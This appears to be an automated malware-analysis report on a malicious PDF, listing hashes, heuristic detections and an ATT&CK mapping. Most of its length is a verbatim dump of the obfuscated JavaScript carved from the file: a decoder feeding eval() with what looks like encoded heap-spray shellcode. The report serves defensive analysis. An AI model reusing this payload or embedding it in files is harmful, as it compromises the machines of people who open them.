Malicious PDF — malware analysis report

Static analysis result for SHA-256 e8baa40ed904714d…

MALICIOUS

PDF

9.5 KB Created: 2010-06-09 16:55:14 Authoring application: P8fb1vjOPgfGeE (via JYWKjO) First seen: 2026-05-11
MD5: b91dd176f501e3b623b4ec9838534e77 SHA-1: 6cedef6703e3575542cec58d913871ccb4f7c5cb SHA-256: e8baa40ed904714d72ad046b9249e9cccc7634d591eaaadd5a5f1273f465b166
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript with a high-confidence heuristic firing for eval() calls, indicating obfuscated code execution. The script is likely designed to download and execute a second-stage payload. The presence of obfuscation and the use of eval() suggest a malicious intent, though the specific family cannot be determined from the available evidence.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    e%y50Ve%y22jV%yVXXj%y5Je(%ydVd5%y5N5d%ym2VX%yV50{%yVVX{%yem(V%y(j0m%y0{T{%y(jT{%y5NN(%yZe4d%y54T{%yT{m{%y24(j%y4d5N%y5(T{%y5NT{%y(Vdm%ydX(d%y525J%yV(0J%yV0VV%y(mV0%ym4(X%ym0md%y52mV%yJ{TZ%yJ0J{%yd24m%yT{d2%yTX40%y4VTV%yJ4T5%yTed5%yTTT5%yd2T2%yTNTd%yTJT2%yTNd2%yTVT2%yd5T{%yTZJ0%y42J0%yT{Te%y4e4X%y004e\"G;\nKKW\nKK} H}K67KEcwdj4ineJAR,D{NaK==KdGQ\nKKKKg42utRiHxsrviBuIK=KyD}HBkc}E\"%y{4{4%y{4{4%y{4{4%y025(%y44j(%yTTNe%yZ0(e%yZ00V%y5244%y5d{4%y5(2m%y5Z0j%y225N%y2222%yZ(J2%yX2{5%y5252%yT{52%y54m2%ye2 …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x23B 8116 bytes
SHA-256: 6159cb3909f22caa5fe0d3856f1f949f72efd9822b3e6416de3bef12446e76d0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 103 of 154 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function QZmb7dY9(QZmb7dY9,xX4DgwVwRYGj) {var AnH5pyUf1oY=QZmb7dY9. substr (xX4DgwVwRYGj, 1);return AnH5pyUf1oY;}/*voxJSQFk0Vjr|NfYsezqH6lxv6Snk|EVV2eoIkP95yrnCM*/function gPiLBl506at6(vlYawouflw6Qh) {/*ur1az|Cmk94NjmS58KanTA2S|rAktMnd3f4sU7U46PHg2*/var ArmcN1AZ3mUtiuc = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*b0k2d33VMzC[awYEQSjK]AIVyF*//*AldVDU55xyyJBo|NF8mJO4s|AmiRan2WOWr*/var SOHqo3VZY6LVM /*rnNfbCocq[qv0S5ENneJQCarpTD4]vMXYa20chTJY95O*/= new String("lSEGQWKMpm(NX52vCO8agPwq.r)zxL9AI,3kuB>}7sn6iY tDoch<HUyfRFb10Vd4{jTJZe");/*ATgexpu0G|fZfaGQmdpCWf|AypSykgHa0n4o*/for(ALaknncoDWRXGzIi=0;ALaknncoDWRXGzIi<ArmcN1AZ3mUtiuc.length;ALaknncoDWRXGzIi++) {if(vlYawouflw6Qh == QZmb7dY9(SOHqo3VZY6LVM, ALaknncoDWRXGzIi)) {/*peZG9zlZ5[CZhFwCkp1P8p0fxQVa]Au0dJ7d9*/return QZmb7dY9(ArmcN1AZ3mUtiuc, ALaknncoDWRXGzIi);/*A5b5U8AGBlw21u <rPV8lwKkhAEq8]qhal8V67VD86z*/}}return vlYawouflw6Qh;}/*xkZf0udbhnCEoGvmnb[DCIY9Fu]Dr24f*//*TATEevlIxqw4|Zh3jl6sA5yu7|bzw6SG7mKbXwjKcWF4*/var HSrRHo5U1Mtdnr6 = new String;var qZzDT = new String("\nfk<K>)L9ozRrA8JihC)vK=KD}RKm<<kbEG;\nfk<K5JDg,yO)uNx5.}z3;\n7yDBU6oDKaRTUq4afgr}N6TzOEx2}Y0RNY0s13a)0rpKu5atv}nBTPoozCJ}GQ\nKKRn6 }KEx2}Y0RNY0s13a)0rM }DsUnK*KdKlKu5atv}nBTPoozCJ}GQ\nKKKKx2}Y0RNY0s13a)0rK+=Kx2}Y0RNY0s13a)0r;\nKKW\nKKx2}Y0RNY0s13a)0rK=Kx2}Y0RNY0s13a)0rMHyuHU<6DsE0pKu5atv}nBTPoozCJ}K/KdG;\nKK<}Uy<DKx2}Y0RNY0s13a)0r;\nW\n7yDBU6oDKcYqsnu)<OrrB<3{2Ecwdj4ineJAR,D{NaGQ\nKKfk<KBud9NzPLUDZ PmVmK=K0F0B0B0B0B;\nKKfk<Kg42utRiHxsrviBuIK=KyD}HBkc}E\"%y{4{4%y{4{4%y{4{4%y025(%y44j(%yTTNe%yZ0(e%yZ00V%y5244%y5d{4%y5(2m%y5Z0j%y225N%y2222%yZ(J2%yX2{5%y5252%yT{52%y54m2%ye2T{%y{d24%ye2T{%yT55J%y5204%y525(%yT{52%y(e04%yTVZJ%y5VmV%y0J04%y52VV%y5252%ymmTT%y(e5(%yJJZJ%yTjVV%y0J5V%y52V2%y5252%ymmTT%y(e5J%yNmZJ%yV0j2%y0JdX%y520X%y5252%ymmTT%y(e54%y00ZJ%y02dV%y0JZ2%y524(%y5252%ymmTT%y(e22%yd5ZJ%y0meT%y0JjJ%y52de%y5252%ymmTT%ym22(%yXJT2%yemdN%yTTVj%y2Jmm%y5Z0T%y5255%y(V52%yemTT%yT{N(%y5(mm%y55Zj%yT{(T%y2J(m%y0J(e%y52T{%y5252%yZJ(2%y2jXe%ye2N0%yJZ0J%y5252%yTT52%y24mm%ydmT{%yd2TN%yTT(2%yN2mm%yV0ZJ%y5252%y(252%ymmT{%yZj2(%y(T5X%y(mT{%y0J2J%y52Z5%y5252%ymm5N%ydZN2%y(452%yNVeV%ydZZm%y5(m2%yZmeJ%y5252%yemV0%yT{N2%y54mm%y55Zj%yT{(T%y2J(m%ym20J%y5252%yZj52%y(J5Z%ymm5N%yXNN(%y(N4{%yV0(N%yN2em%y(N(2%ymmT{%yZj24%y(T5m%y(mT{%y0J2J%y52NN%y5252%y52Zj%yemV0%yT{N2%y5Jmm%y5XZj%yT{(T%y2J(m%y220J%y5252%yZj52%yT{V0%y22mm%y55Zj%yT{(T%y2J(m%y520J%y5252%ym552%y(X({%y055N%y055N%y055N%y055N%y04TN%y(j5(%yT{(N%y0X4j%y(XVZ%y02V0%yT{(m%yT{04%y5Jed%y(dT{%y(e54%yeNT{%yT{X4%y2Ve(%y5NeJ%y(eVN%yeeT{%y5NN2%yXNVN%ymTdT%y{dm5%ydN5N%yXN(e%y50Ve%y22jV%yVXXj%y5Je(%ydVd5%y5N5d%ym2VX%yV50{%yVVX{%yem(V%y(j0m%y0{T{%y(jT{%y5NN(%yZe4d%y54T{%yT{m{%y24(j%y4d5N%y5(T{%y5NT{%y(Vdm%ydX(d%y525J%yV(0J%yV0VV%y(mV0%ym4(X%ym0md%y52mV%yJ{TZ%yJ0J{%yd24m%yT{d2%yTX40%y4VTV%yJ4T5%yTed5%yTTT5%yd2T2%yTNTd%yTJT2%yTNd2%yTVT2%yd5T{%yTZJ0%y42J0%yT{Te%y4e4X%y004e\"G;\nKK67KEcwdj4ineJAR,D{NaK==KVGQ\nKKKKBud9NzPLUDZ PmVmK=K0F40404040;\nKKKKg42utRiHxsrviBuIK=KyD}HBkc}E\"%y{4{4%y{4{4%y{4{4%y025(%y44j(%yTTNe%yZ0(e%yZ00V%y5244%y5d{4%y5(2m%y5Z0j%y225N%y2222%yZ(J2%yX2{5%y5252%yT{52%y54m2%ye2T{%y{d24%ye2T{%yT55J%y5204%y525(%yT{52%y(e04%yTVZJ%y5VmV%y0J04%y52VV%y5252%ymmTT%y(e5(%yJJZJ%yTjVV%y0J5V%y52V2%y5252%ymmTT%y(e5J%yNmZJ%yV0j2%y0JdX%y520X%y5252%ymmTT%y(e54%y00ZJ%y02dV%y0JZ2%y524(%y5252%ymmTT%y(e22%yd5ZJ%y0meT%y0JjJ%y52de%y5252%ymmTT%ym22(%yXJT2%yemdN%yTTVj%y2Jmm%y5Z0T%y5255%y(V52%yemTT%yT{N(%y5(mm%y55Zj%yT{(T%y2J(m%y0J(e%y52T{%y5252%yZJ(2%y2jXe%ye2N0%yJZ0J%y5252%yTT52%y24mm%ydmT{%yd2TN%yTT(2%yN2mm%yV0ZJ%y5252%y(252%ymmT{%yZj2(%y(T5X%y(mT{%y0J2J%y52Z5%y5252%ymm5N%ydZN2%y(452%yNVeV%ydZZm%y5(m2%yZmeJ%y5252%yemV0%yT{N2%y54mm%y55Zj%yT{(T%y2J(m%ym20J%y5252%yZj52%y(J5Z%ymm5N%yXNN(%y(N4{%yV0(N%yN2em%y(N(2%ymmT{%yZj24%y(T5m%y(mT{%y0J2J%y52NN%y5252%y52Zj%yemV0%yT{N2%y5Jmm%y5XZj%yT{(T%y2J(m%y220J%y5252%yZj52%yT{V0%y22mm%y55Zj%yT{(T%y2J(m%y520J%y5252%ym552%y(X({%y055N%y055N%y055N%y055N%y04TN%y(j5(%yT{(N%y0X4j%y(XVZ%y02V0%yT{(m%yT{04%y5Jed%y(dT{%y(e54%yeNT{%yT{X4%y2Ve(%y5NeJ%y(eVN%yeeT{%y5NN2%yXNVN%ymTdT%y{dm5%ydN5N%yXN(e%y50Ve%y22jV%yVXXj%y5Je(%ydVd5%y5N5d%ym2VX%yV50{%yVVX{%yem(V%y(j0m%y0{T{%y(jT{%y5NN(%yZe4d%y54T{%yT{m{%y24(j%y4d5N%y5(T{%y5NT{%y(Vdm%ydX(d%y525J%yV(0J%yV0VV%y(mV0%ym4(X%ym0md%y52mV%yJ{TZ%yJ0J{%yd24m%yT{d2%yTX40%y4VTV%yJ4T5%yTed5%yTTT5%yd2T2%yTNTd%yTJT2%yTNd2%yTVT2%yd5T{%yTZJ0%y42J0%yT{Te%y4e4X%y004e\"G;\nKKW\nKK} H}K67KEcwdj4ineJAR,D{NaK==KdGQ\nKKKKg42utRiHxsrviBuIK=KyD}HBkc}E\"%y{4{4%y{4{4%y{4{4%y025(%y44j(%yTTNe%yZ0(e%yZ00V%y5244%y5d{4%y5(2m%y5Z0j%y225N%y2222%yZ(J2%yX2{5%y5252%yT{52%y54m2%ye2T{%y{d24%ye2T{%yT55J%y5204%y525(%yT{52%y(e04%yTVZJ%y5VmV%y0J04%y52VV%y5252%ymmTT%y(e5(%yJJZJ%yTjVV%y0J5V%y52V2%y5252%ymmTT%y(e5J%yNmZJ%yV0j2%y0JdX%y520X%y5252%ymmTT%y(e54%y00ZJ%y02dV%y0JZ2%y524(%y5252%ymmTT%y(e22%yd5ZJ%y0meT%y0JjJ%y52de%y5252%ymmTT%ym22(%yXJT2%yemdN%yTTVj%y2Jmm%y5Z0T%y5255%y(V52%yemTT%yT{N(%y5(mm%y55Zj%yT{(T%y2J(m%y0J(e%y52T{%y5252%yZJ(2%y2jXe%ye2N0%yJZ0J%y5252%yTT52%y24mm%ydmT{%yd2TN%yTT(2%yN2mm%yV0ZJ%y5252%y(252%ymmT{%yZj2(%y(T5X%y(mT{%y0J2J%y52Z5%y5252%ymm5N%ydZN2%y(452%yNVeV%ydZZm%y5(m2%yZmeJ%y5252%yemV0%yT{N2%y54mm%y55Zj%yT{(T%y2J(m%ym20J%y5252%yZj52%y(J5Z%ymm5N%yXNN(%y(N4{%yV0(N%yN2em%y(N(2%ymmT{%yZj24%y(T5m%y(mT{%y0J2J%y52NN%y5252%y52Zj%yemV0%yT{N2%y5Jmm%y5XZj%yT{(T%y2J(m%y220J%y5252%yZj52%yT{V0%y22mm%y55Zj%yT{(T%y2J(m%y520J%y5252%ym552%y(X({%y055N%y055N%y055N%y055N%y04TN%y(j5(%yT{(N%y0X4j%y(XVZ%y02V0%yT{(m%yT{04%y5Jed%y(dT{%y(e54%yeNT{%yT{X4%y2Ve(%y5NeJ%y(eVN%yeeT{%y5NN2%yXNVN%ymTdT%y{dm5%ydN5N%yXN(e%y50Ve%y22jV%yVXXj%y5Je(%ydVd5%y5N5d%ym2VX%yV50{%yVVX{%yem(V%y(j0m%y0{T{%y(jT{%y5NN(%yZe4d%y54T{%yT{m{%y24(j%y4d5N%y5(T{%y5NT{%y(Vdm%ydX(d%y525J%yV(0J%yV0VV%y(mV0%ym4(X%ym0md%y52mV%yJ{TZ%yJ0J{%yd24m%yT{d2%yTX40%y4VTV%yJ4T5%yTed5%yTTT5%yd2T2%yTNTd%yTJT2%yTNd2%yTVT2%yd5T{%yTZJ0%y42J0%yT{Te%y4e4X%y004e\"G;\nKKW\nKKfk<KcB{rTrfbX{ik5YYtK=K0F{00000;\nKKfk<Kf1w3RZ).DHsILOj6K=Kg42utRiHxsrviBuIM }DsUnK*Kd;\nKKfk<Ku5atv}nBTPoozCJ}K=KcB{rTrfbX{ik5YYtK-KEf1w3RZ).DHsILOj6K+K0F4ZG;\nKKfk<Kx2}Y0RNY0s13a)0rK=KyD}HBkc}E\"%ye0e0%ye0e0\"G;\nKKx2}Y0RNY0s13a)0rK=KaRTUq4afgr}N6TzOEx2}Y0RNY0s13a)0rpKu5atv}nBTPoozCJ}G;\nKKfk<K2e0V,Tbte6PPzZ0vK=KEBud9NzPLUDZ PmVmK-K0F{00000GK/KcB{rTrfbX{ik5YYt;\nKK7o<KEfk<K8Ac{>Cx)0mb}x{wqK=K0;K8Ac{>Cx)0mb}x{wqKlK2e0V,Tbte6PPzZ0v;K8Ac{>Cx)0mb}x{wqK++KGQ\nKKKK>)L9ozRrA8JihC)v[8Ac{>Cx)0mb}x{wq]K=Kx2}Y0RNY0s13a)0rK+Kg42utRiHxsrviBuI;\nKKW\nW\n7yDBU6oDKcAqYBPAYTUZ,VvoZEGQ\nKKfk<Ks>()y}Hjch6OUTsjK=K0;\nKKfk<KBjc2)PVI2ZTvqUw(K=KkccMf6}R}<9}<H6oDMUozU<6DsEG;\nKKkccMB }k<x6t}qyUE5JDg,yO)uNx5.}z3G;\n\nKK67KEBjc2)PVI2ZTvqUw(KlKJMVGQ\nKKKKcYqsnu)<OrrB<3{2E0G;\nKKKKfk<Kv,BzXLA{g5g5a48FK=KyD}HBkc}E\"%y0B0B%y0B0B\"G;\nKKKKRn6 }KEv,BzXLA{g5g5a48FM }DsUnKlK{{ejdGv,BzXLA{g5g5a48FK+=Kv,BzXLA{g5g5a48F;\nKKKKUn6HKMBo  kuzUo<}K=KNo  kuMBo  }BU5tk6 OD7oEQ\nKKKKKKHyuiK:K\"\"pKtHsK:Kv,BzXLA{g5g5a48F\nKKKKW\nKKKKG;\nKKW\n67KEBjc2)PVI2ZTvqUw(KS=KeGQ\nKKKKU<bKQ\n67KEkccM>oBMNo  kuMs}UOBoDGQ\nKKKKKKKKcYqsnu)<OrrB<3{2EdG;\nKKKKKKKKfk<KFeN39NJYa(d6TqyBK=KyD}HBkc}E\"%0e\"G;\nKKKKKKKKRn6 }KEFeN39NJYa(d6TqyBM }DsUnKlK0F{000GFeN39NJYa(d6TqyBK+=KFeN39NJYa(d6TqyB;\nKKKKKKKKFeN39NJYa(d6TqyBK=K\"wM\"K+KFeN39NJYa(d6TqyB;\nkccM>oBMNo  kuMs}UOBoDEFeN39NJYa(d6TqyBG;\nKKKKKKKKs>()y}Hjch6OUTsjK=KV;\nKKKKKKW\nKKKKKK} H}KQ\nKKKKKKKKs>()y}Hjch6OUTsjK=KV;\nKKKKKKW\nKKKKW\nKKKKBkUBnKE}GQ\nKKKKKKs>()y}Hjch6OUTsjK=KV;\nKKKKW\nKKKK67KEs>()y}Hjch6OUTsjK==KVGQ\nKKKKKK67KEEBjc2)PVI2ZTvqUw(KS=KJMV&&KBjc2)PVI2ZTvqUw(KlKeGGQ\nKKKKKKKKcYqsnu)<OrrB<3{2EVG;\nKKKKKKKKfk<KXITm4uXwh3B(BfeiK=K\"Vdeeeeeeeeeeeeeeeeee\";\nKKKKKKKK7o<KENgO3IqaHkgk7Y9OnK=K0;KNgO3IqaHkgk7Y9OnKlKdJT;KNgO3IqaHkgk7Y9OnK++KGQ\nKKKKKKKKKKXITm4uXwh3B(BfeiK+=K\"Z\";\nKKKKKKKKW\nKKKKKKKKyU6 Mc<6DU7E\"%{j0007\"pKXITm4uXwh3B(BfeiG;\nKKKKKKW\nKKKKW\nKKW\nW\nkccMuwHj1Jzh7j4O1(djK=KcAqYBPAYTUZ,VvoZ;\n5JDg,yO)uNx5.}z3K=KkccMH}Ux6t}qyUE\"kccMuwHj1Jzh7j4O1(djEG\"pKV0G;\n");/*myVOuDOq28nuadgXw{UYxvvjU6CqB7cov}Ag1GMuF0efTB2GoNe*//*AQBTNDAOAd3w|vSJ2e38UX|oZWuDjPfigh1*/for(jGPVXoc6RkP91Wnxqe9=0;jGPVXoc6RkP91Wnxqe9<qZzDT.length;jGPVXoc6RkP91Wnxqe9++)HSrRHo5U1Mtdnr6 += gPiLBl506at6(QZmb7dY9(qZzDT,jGPVXoc6RkP91Wnxqe9));eval(HSrRHo5U1Mtdnr6);/*l28lV1YmmqvfKodf[AKcU4]AKCcqjUZKMXwh*/

Open this report in the interactive analyzer, or submit your own file for analysis.